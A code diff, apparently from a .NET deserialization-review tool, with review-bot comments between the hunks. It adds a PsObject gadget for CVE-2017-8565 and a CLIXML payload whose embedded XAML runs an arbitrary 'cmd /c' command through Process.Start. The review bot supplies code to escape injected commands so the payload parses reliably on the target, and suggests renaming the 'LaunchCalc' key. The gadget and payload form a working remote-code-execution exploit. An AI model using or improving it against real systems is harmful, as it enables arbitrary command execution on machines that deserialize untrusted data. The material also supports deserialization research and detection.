diff --git a/DeReviewer.Analysis/DeReviewer.Analysis.csproj b/DeReviewer.Analysis/DeReviewer.Analysis.csproj index 1705161..64d7d89 100644 --- a/DeReviewer.Analysis/DeReviewer.Analysis.csproj +++ b/DeReviewer.Analysis/DeReviewer.Analysis.csproj @@ -1,69 +1,68 @@  - - - Debug - AnyCPU - {495F718A-D925-4639-B6B9-00D00A17B3F6} - Library - Properties - DeReviewer.Analysis - DeReviewer.Analysis - v4.8 - 512 - - - AnyCPU - true - full - false - bin\Debug\ - DEBUG;TRACE - prompt - 4 - - - AnyCPU - pdbonly - true - bin\Release\ - TRACE - prompt - 4 - - - - - - - - - - - - - - - - - - - - - - - - {f1b76fe5-8338-4bf6-9570-b285e852952b} - dnlib - - - - - - + \ No newline at end of file diff --git a/DeReviewer.KnowledgeBase/Cases/BinaryFormatterPatterns.cs b/DeReviewer.KnowledgeBase/Cases/BinaryFormatterPatterns.cs index 47b807f..8475bf2 100644 --- a/DeReviewer.KnowledgeBase/Cases/BinaryFormatterPatterns.cs +++ b/DeReviewer.KnowledgeBase/Cases/BinaryFormatterPatterns.cs 
@@ -4,52 +4,98 @@ namespace DeReviewer.KnowledgeBase.Cases { - public class BinaryFormatterPatterns : Case - { - public void Deserialize() - { - var serializer = new BinaryFormatter(); - Pattern.CreateBySignature(it => - serializer.Deserialize( - it.IsPayloadOf().Format())); - } - - public void DeserializeHeaderHandler() - { - var serializer = new BinaryFormatter(); - Pattern.CreateBySignature(it => - serializer.Deserialize( - it.IsPayloadOf().Format(), - null)); - } - - public void DeserializeMethodResponse() - { - var serializer = new BinaryFormatter(); - Pattern.CreateBySignature(it => - serializer.DeserializeMethodResponse( - it.IsPayloadOf().Format(), - null, - null)); - } - - public void UnsafeDeserialize() - { - var serializer = new BinaryFormatter(); - Pattern.CreateBySignature(it => - serializer.UnsafeDeserialize( - it.IsPayloadOf().Format(), - null)); - } - - public void UnsafeDeserializeMethodResponse() - { - var serializer = new BinaryFormatter(); - Pattern.CreateBySignature(it => - serializer.UnsafeDeserializeMethodResponse( - it.IsPayloadOf().Format(), - null, - null)); - } + public class BinaryFormatterPatterns : Case + { + public void DeserializeTypeConfuseDelegate() + { + var serializer = new BinaryFormatter(); + Pattern.CreateBySignature(it => + serializer.Deserialize( + it.IsPayloadOf().Format())); + } + + public void DeserializePsObject() + { + var serializer = new BinaryFormatter(); + Pattern.CreateBySignature(it => + serializer.Deserialize( + it.IsPayloadOf().Format())); + } + + public void DeserializeHeaderHandlerTypeConfuseDelegate() + { + var serializer = new BinaryFormatter(); + Pattern.CreateBySignature(it => + serializer.Deserialize( + it.IsPayloadOf().Format(), + null)); + } + + public void DeserializeHeaderHandlerPsObject() + { + var serializer = new BinaryFormatter(); + Pattern.CreateBySignature(it => + serializer.Deserialize( + it.IsPayloadOf().Format(), + null)); + } + + public void DeserializeMethodResponseTypeConfuseDelegate() + { 
+ var serializer = new BinaryFormatter(); + Pattern.CreateBySignature(it => + serializer.DeserializeMethodResponse( + it.IsPayloadOf().Format(), + null, + null)); + } + + public void DeserializeMethodResponsePsObject() + { + var serializer = new BinaryFormatter(); + Pattern.CreateBySignature(it => + serializer.DeserializeMethodResponse( + it.IsPayloadOf().Format(), + null, + null)); + } + + public void UnsafeDeserializeTypeConfuseDelegate() + { + var serializer = new BinaryFormatter(); + Pattern.CreateBySignature(it => + serializer.UnsafeDeserialize( + it.IsPayloadOf().Format(), + null)); + } + + public void UnsafeDeserializePsObject() + { + var serializer = new BinaryFormatter(); + Pattern.CreateBySignature(it => + serializer.UnsafeDeserialize( + it.IsPayloadOf().Format(), + null)); + } + + public void UnsafeDeserializeMethodResponseTypeConfuseDelegate() + { + var serializer = new BinaryFormatter(); + Pattern.CreateBySignature(it => + serializer.UnsafeDeserializeMethodResponse( + it.IsPayloadOf().Format(), + null, + null)); + } + + public void UnsafeDeserializeMethodResponsePsObject() + { + var serializer = new BinaryFormatter(); + Pattern.CreateBySignature(it => + serializer.UnsafeDeserializeMethodResponse( + it.IsPayloadOf().Format(), + null, + null)); } + } } \ No newline at end of file diff --git a/DeReviewer.KnowledgeBase/DeReviewer.KnowledgeBase.csproj b/DeReviewer.KnowledgeBase/DeReviewer.KnowledgeBase.csproj index 43ef35a..5932718 100644 --- a/DeReviewer.KnowledgeBase/DeReviewer.KnowledgeBase.csproj +++ b/DeReviewer.KnowledgeBase/DeReviewer.KnowledgeBase.csproj @@ -37,6 +37,9 @@ + + ..\packages\Microsoft.PowerShell.5.ReferenceAssemblies.1.1.0\lib\net4\System.Management.Automation.dll + @@ -67,6 +70,7 @@ + @@ -77,6 +81,7 @@ + diff --git a/DeReviewer.KnowledgeBase/Gadgets/PsObject.cs b/DeReviewer.KnowledgeBase/Gadgets/PsObject.cs new file mode 100644 index 0000000..1230064 --- /dev/null +++ b/DeReviewer.KnowledgeBase/Gadgets/PsObject.cs 
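Review bot: Every BinaryFormatter sink in this hunk is now spelled out twice, once per gadget, with bodies that differ only in the type argument passed to `IsPayloadOf<…>()` (that generic argument is stripped in this rendering and is inferred from the `…TypeConfuseDelegate` / `…PsObject` method names); a third gadget would add five more near-identical methods. Whether this can be collapsed depends on how `Pattern.CreateBySignature` works — if cases are discovered by reflecting over these public methods and the lambda is read as an expression tree rather than executed, a shared helper such as `private static void DeserializeSink<TGadget>()` would hide the case, so confirm that before deduplicating. Either way the class carries no explanation of the convention; a header comment along the lines of `// One case per (BinaryFormatter sink, gadget) pair, named <Sink><Gadget>; the five sinks are every public Deserialize*/UnsafeDeserialize* overload on BinaryFormatter.` would tell the next contributor what to add when a new gadget lands. The `null` arguments presumably stand for the HeaderHandler / IMethodCallMessage parameters and only matter for signature matching — worth saying so in that comment if true.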
@@ -0,0 +1,39 @@
+using System;
+using System.IO;
+using System.Management.Automation;
+using System.Runtime.Serialization;
+using System.Runtime.Serialization.Formatters.Binary;
+
+namespace DeReviewer.KnowledgeBase.Gadgets
+{
+    // PsObject Gadget by Alvaro Munoz and Oleksandr Mirosh.
+    // Target must run a system not patched for CVE-2017-8565 (Published: 07/11/2017)
+    internal class PsObject : IGadget
+    {
+        public object Build(string command)
+        {
+            string clixmlData = File.ReadAllText(@"Payloads\PsObject.clixml")
+                .Replace("%CMD%", command);
+
+            return new PsObjectMarshal(clixmlData);
+        }
+    }
+
+    [Serializable]
+    internal class PsObjectMarshal : ISerializable
+    {
+        private readonly string clixmlData;
+
+        public void GetObjectData(SerializationInfo info, StreamingContext context)
+        {
+            Type typePso = typeof(PSObject);
+            info.SetType(typePso);
+            info.AddValue("CliXml", clixmlData);
+        }
+
+        public PsObjectMarshal(string clixmlData)
+        {
+            this.clixmlData = clixmlData;
+        }
+    }
+}
diff --git a/DeReviewer.KnowledgeBase/Payloads/PsObject.clixml b/DeReviewer.KnowledgeBase/Payloads/PsObject.clixml
new file mode 100644
index 0000000..6e9f222
--- /dev/null
+++ b/DeReviewer.KnowledgeBase/Payloads/PsObject.clixml
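Review bot: `File.ReadAllText(@"Payloads\PsObject.clixml")` in `Build` resolves against the process working directory, so the gadget throws FileNotFoundException whenever the tool is launched from anywhere other than its output folder; anchor it with `Path.Combine(AppDomain.CurrentDomain.BaseDirectory, "Payloads", "PsObject.clixml")` (this assumes the project copies the payload next to the assembly, which the stripped csproj hunk does not let me confirm). The `%CMD%` replacement also pastes `command` verbatim into XML: the placeholder sits inside a `<System:String>` of XAML that is itself stored as escaped text in the CLIXML, so a command containing `&`, `<` or `"` produces a payload that fails to parse on the target instead of an error here — escape once per XML layer and document that the value lands in `cmd /c "…"`, where embedded double quotes still break the shell quoting. `PsObjectMarshal` deliberately lacks the `(SerializationInfo, StreamingContext)` constructor because it is only ever serialized; a one-line comment saying so would stop someone "fixing" it.
```csharp
public object Build(string command)
{
    // Resolve against the assembly location, not the caller's working directory.
    string payloadPath = Path.Combine(AppDomain.CurrentDomain.BaseDirectory, "Payloads", "PsObject.clixml");
    // %CMD% is XAML text stored as escaped text inside the CLIXML <S> node: one escape per XML layer
    // (verify the layer count against PsObject.clixml). Double quotes still break the cmd /c "..." quoting.
    string escapedCommand = System.Security.SecurityElement.Escape(System.Security.SecurityElement.Escape(command));
    string clixmlData = File.ReadAllText(payloadPath).Replace("%CMD%", escapedCommand);
    return new PsObjectMarshal(clixmlData);
}
```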
@@ -0,0 +1,63 @@ + + + + Microsoft.Management.Infrastructure.CimInstance#System.Management.Automation/RunspaceInvoke5 + Microsoft.Management.Infrastructure.CimInstance#RunspaceInvoke5 + Microsoft.Management.Infrastructure.CimInstance + System.Object + + RunspaceInvoke5 + + + RunspaceInvoke5 + + + + + System.Windows.Markup.XamlReader[], PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35 + System.Array + System.Object + + + + <ResourceDictionary + xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation" + xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" + xmlns:System="clr-namespace:System;assembly=mscorlib" + xmlns:Diag="clr-namespace:System.Diagnostics;assembly=system"> + <ObjectDataProvider x:Key="LaunchCalc" ObjectType = "{ x:Type Diag:Process}" MethodName = "Start" > + <ObjectDataProvider.MethodParameters> + <System:String>cmd</System:String> + <System:String>/c "%CMD%" </System:String> + </ObjectDataProvider.MethodParameters> + </ObjectDataProvider> +</ResourceDictionary> + + + + + + + + System.Collections.ArrayList + System.Object + + + + + RunspaceInvoke5 + System.Management.Automation + + 460929192 + <CLASS NAME="RunspaceInvoke5" ><PROPERTY NAME="test1" TYPE ="string" ></PROPERTY></CLASS> + + + + + + + + + + + \ No newline at end of file diff --git a/DeReviewer.KnowledgeBase/packages.config b/DeReviewer.KnowledgeBase/packages.config index baacd88..c4d578c 100644 --- a/DeReviewer.KnowledgeBase/packages.config +++ b/DeReviewer.KnowledgeBase/packages.config @@ -1,4 +1,5 @@  + \ No newline at end of file
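Review bot: The ObjectDataProvider is still keyed `x:Key="LaunchCalc"` although the command is now the `%CMD%` placeholder; rename it to something neutral such as `x:Key="RunCommand"` so the payload no longer reads as the calc proof-of-concept it was copied from. Nothing in the file records that `%CMD%` is replaced verbatim by `PsObject.Build` and therefore has to arrive already XML-escaped for both the XAML and the surrounding CLIXML text node, and that it is wrapped in `/c "%CMD%"` for cmd; if the CLIXML reader tolerates an XML comment at the top of the document (worth checking before relying on it), state that contract there, otherwise in the gadget class that loads the file. The tag structure is stripped in this rendering, so I could not verify the escaping of the embedded XAML against the file itself.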